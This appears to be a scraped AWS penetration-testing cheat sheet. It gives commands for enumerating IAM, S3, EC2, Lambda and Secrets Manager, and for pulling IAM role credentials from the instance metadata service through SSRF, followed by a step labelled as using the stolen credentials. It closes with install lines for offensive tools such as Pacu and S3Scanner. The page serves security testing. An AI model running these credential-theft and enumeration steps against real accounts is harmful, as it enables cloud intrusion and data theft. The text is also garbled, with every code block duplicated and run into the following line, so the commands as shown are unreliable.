AWS Pentesting
AWS environments are often compromised through misconfigured IAM permissions, exposed S3 buckets, and Server-Side Request Forgery (SSRF) attacks targeting the Instance Metadata Service (IMDS).
Initial Access & Enumeration
AWS CLI Configuration.
aws configure
# Enter Access Key ID, Secret Access Key, Regionaws configure
# Enter Access Key ID, Secret Access Key, RegionCheck current identity.
aws sts get-caller-identityaws sts get-caller-identityEnumerate IAM users and roles.
aws iam list-users
aws iam list-roles
aws iam list-groupsaws iam list-users
aws iam list-roles
aws iam list-groupsGet user details.
aws iam get-user --user-name target-user
aws iam list-attached-user-policies --user-name target-user
aws iam list-user-policies --user-name target-useraws iam get-user --user-name target-user
aws iam list-attached-user-policies --user-name target-user
aws iam list-user-policies --user-name target-userEnumerate S3 buckets.
aws s3 ls
aws s3 ls s3://bucket-name --recursiveaws s3 ls
aws s3 ls s3://bucket-name --recursiveCheck for public buckets (unauthenticated).
curl https://bucket-name.s3.amazonaws.com/
aws s3 ls s3://bucket-name --no-sign-requestcurl https://bucket-name.s3.amazonaws.com/
aws s3 ls s3://bucket-name --no-sign-requestEC2 enumeration.
aws ec2 describe-instances
aws ec2 describe-security-groups
aws ec2 describe-vpcsaws ec2 describe-instances
aws ec2 describe-security-groups
aws ec2 describe-vpcsLambda functions.
aws lambda list-functions
aws lambda get-function --function-name target-functionaws lambda list-functions
aws lambda get-function --function-name target-functionSecrets Manager.
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id secret-nameaws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id secret-nameMetadata Service Exploitation
EC2 Instance Metadata Service (IMDS) v1 - Exploitable via SSRF.
Get instance identity.
curl http://169.254.169.254/latest/meta-data/curl http://169.254.169.254/latest/meta-data/Get IAM role credentials.
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAMEcurl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAMEResponse contains AccessKeyId, SecretAccessKey, Token.
# Response format:
# {
# "Code" : "Success",
# "LastUpdated" : "...",
# "Type" : "AWS-HMAC",
# "AccessKeyId" : "ASIA...",
# "SecretAccessKey" : "...",
# "Token" : "...",
# "Expiration" : "..."
# }# Response format:
# {
# "Code" : "Success",
# "LastUpdated" : "...",
# "Type" : "AWS-HMAC",
# "AccessKeyId" : "ASIA...",
# "SecretAccessKey" : "...",
# "Token" : "...",
# "Expiration" : "..."
# }Use stolen credentials.
export AWS_ACCESS_KEY_ID="ASIAXXX"
export AWS_SECRET_ACCESS_KEY="xxx"
export AWS_SESSION_TOKEN="xxx"export AWS_ACCESS_KEY_ID="ASIAXXX"
export AWS_SECRET_ACCESS_KEY="xxx"
export AWS_SESSION_TOKEN="xxx"IMDSv2 (requires token).
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/AWS Tools
Pacu
ExploitationThe AWS exploitation framework. Designed for testing the security of Amazon Web Services environments.
Installation
pip3 install pacupip3 install pacuenumerate-iam
EnumerationBrute force enumeration of AWS IAM permissions.
Installation
pip install enumerate-iampip install enumerate-iamS3Scanner
ScanningScan for open S3 buckets and dump the contents.
Installation
pip install s3scannerpip install s3scannerCloudMapper
VisualizationAnalyze your AWS environment. Helps you create network diagrams and audit security.
Installation
pip install cloudmapperpip install cloudmapper